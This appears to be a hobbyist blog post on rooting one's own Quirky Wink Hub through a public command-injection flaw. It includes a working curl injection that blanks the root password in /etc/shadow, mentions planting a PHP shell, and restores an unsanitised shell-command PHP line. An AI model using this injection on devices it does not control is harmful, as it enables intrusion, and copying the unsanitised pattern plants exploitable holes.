Rooting The Quirky Wink Hub

As you may know, the Quirky Wink Hub is an affordable Home Automation device containing the following radios:  WiFi, Bluetooth, ZigBee, Z-Wave, Lutron, and Kidde.  It operates using the Wink app and connecting through a cloud server.  It is sold at Home Depot and Amazon.

Well, that’s good but what if we want to take matters into our own hands?  The device is a nice little Freescale i.MX283 based Linux box that we can have some fun with, especially with all the radio support.

Luckily, the enterprising crew at GTVHacker has discovered a nice exploit that makes rooting this hardware quite easy: http://dc22.gtvhacker.com/index.php/Wink_Hub%E2%80%8B%E2%80%8B

This is briefly discussed at:  http://hackaday.com/2014/08/09/defcon-22-hack-all-the-things/

Unfortunately this is patched in the most recent update.  The set_dev_value.php file has been removed.  So be sure to do this before you have connected the hub to the internet.

But what about a how-to?

Let’s get to it:

Plug in your Quirky Wink Hub and connect to the default WiFi AP that it creates.

Using cURL or similar, send the following command to the lighttpd server to remove the root password:

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

We should be able to access the shell now through the UART using a 3.3V TTL adapter.

If we don’t have the hardware to do that, there is another option.  You can use the tftp command to bring over a replacement rsa key file for dropbear which runs on the device by default or use another cURL command to append your public rsa key to the /root/.ssh/authorized_keys file.  Then you can access the device through SSH.  Or you can create a new php file to preserve the shell command access through the web server.

Now that we have access to the device, we can notice that there is a web interface available by default at /devices.php.  This allows us to view and control the home automation devices linked to the hub.  However the control part does not work since a file has been removed.  We can restore that function by editing the /var/www/set_dev_value.php file as follows:

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

So we have a fully functional web interface to view and control the status of our connected devices.  We can use this as an API.

To add devices, we can do so using the aprontest binary which prints some nice help instructions when run with no arguments.

If we want to block the cloud connections and updates we can add the following entries to the hosts file:

127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Finally, we want to connect the hub as a client to our own WiFi network.  We can do so by POSTing the WiFi network information to the web server on the hub as follows:

curl "http://192.168.0.1/index.php" -d '{"ssid":"my_ssid","pass":"my_wifi_password"}'

As you can see the network parameters are just JSON encoded.

For some reason, these settings don’t seem to be saved to the database and persist through a reboot.  Possibly because we did not create a user account with a valid token.  So we can

cp /database/wpa_supplicant.conf /etc/

Then we can edit the /etc/init.d/S41wireless file to reflect the new location of wpa_supplicant.conf.

We can prevent these settings from being deleted if we have not created a wink account by doing:

touch /database/oauth

No, apparently the oauth file gets deleted if it is invalid so we need to edit /etc/init.d/S31platform to prevent it from deleting our wpa_supplicant.conf file.

Well, we should have a nice Quirky Wink Hub completely under our control now and ready to serve us faithfully without help from the cloud.

Advertisements